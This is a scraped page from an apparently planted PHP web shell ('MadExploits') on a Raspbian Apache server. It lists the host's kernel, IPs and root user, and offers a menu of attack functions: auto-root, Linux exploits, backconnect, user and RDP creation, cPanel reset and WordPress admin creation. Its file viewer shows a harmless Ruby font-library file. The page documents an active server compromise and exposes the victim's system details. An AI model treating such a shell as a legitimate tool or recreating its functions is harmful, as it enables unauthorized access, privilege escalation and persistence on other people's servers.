Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
ttfunk /
[ HOME SHELL ]
Name
Size
Permission
Action
encoding
[ DIR ]
drwxr-xr-x
subset
[ DIR ]
drwxr-xr-x
table
[ DIR ]
drwxr-xr-x
collection.rb
729
B
-rw-r--r--
directory.rb
480
B
-rw-r--r--
reader.rb
896
B
-rw-r--r--
resource_file.rb
2.2
KB
-rw-r--r--
subset.rb
566
B
-rw-r--r--
subset_collection.rb
2.19
KB
-rw-r--r--
table.rb
653
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subset_collection.rb
require_relative 'subset' module TTFunk class SubsetCollection def initialize(original) @original = original @subsets = [Subset.for(@original, :mac_roman)] end def [](subset) @subsets[subset] end # +characters+ should be an array of UTF-16 characters def use(characters) characters.each do |char| covered = false @subsets.each_with_index do |subset, _i| next unless subset.covers?(char) subset.use(char) covered = true break end unless covered @subsets << Subset.for(@original, :unicode_8bit) @subsets.last.use(char) end end end # +characters+ should be an array of UTF-16 characters. Returns # an array of subset chunks, where each chunk is another array of # two elements. The first element is the subset number, and the # second element is the string of characters to render with that # font subset. The strings will be encoded for their subset font, # and so may not look (in the raw) like what was passed in, but # they will render correctly with the indicated subset font. def encode(characters) return [] if characters.empty? # TODO: probably would be more optimal to nix the #use method, # and merge it into this one, so it can be done in a single # pass instead of two passes. use(characters) parts = [] current_subset = 0 current_char = 0 char = characters[current_char] loop do while @subsets[current_subset].includes?(char) char = @subsets[current_subset].from_unicode(char) if parts.empty? || parts.last[0] != current_subset encoded_char = char.chr if encoded_char.respond_to?(:force_encoding) encoded_char.force_encoding('ASCII-8BIT') end parts << [current_subset, encoded_char] else parts.last[1] << char end current_char += 1 return parts if current_char >= characters.length char = characters[current_char] end current_subset = (current_subset + 1) % @subsets.length end end end end
Close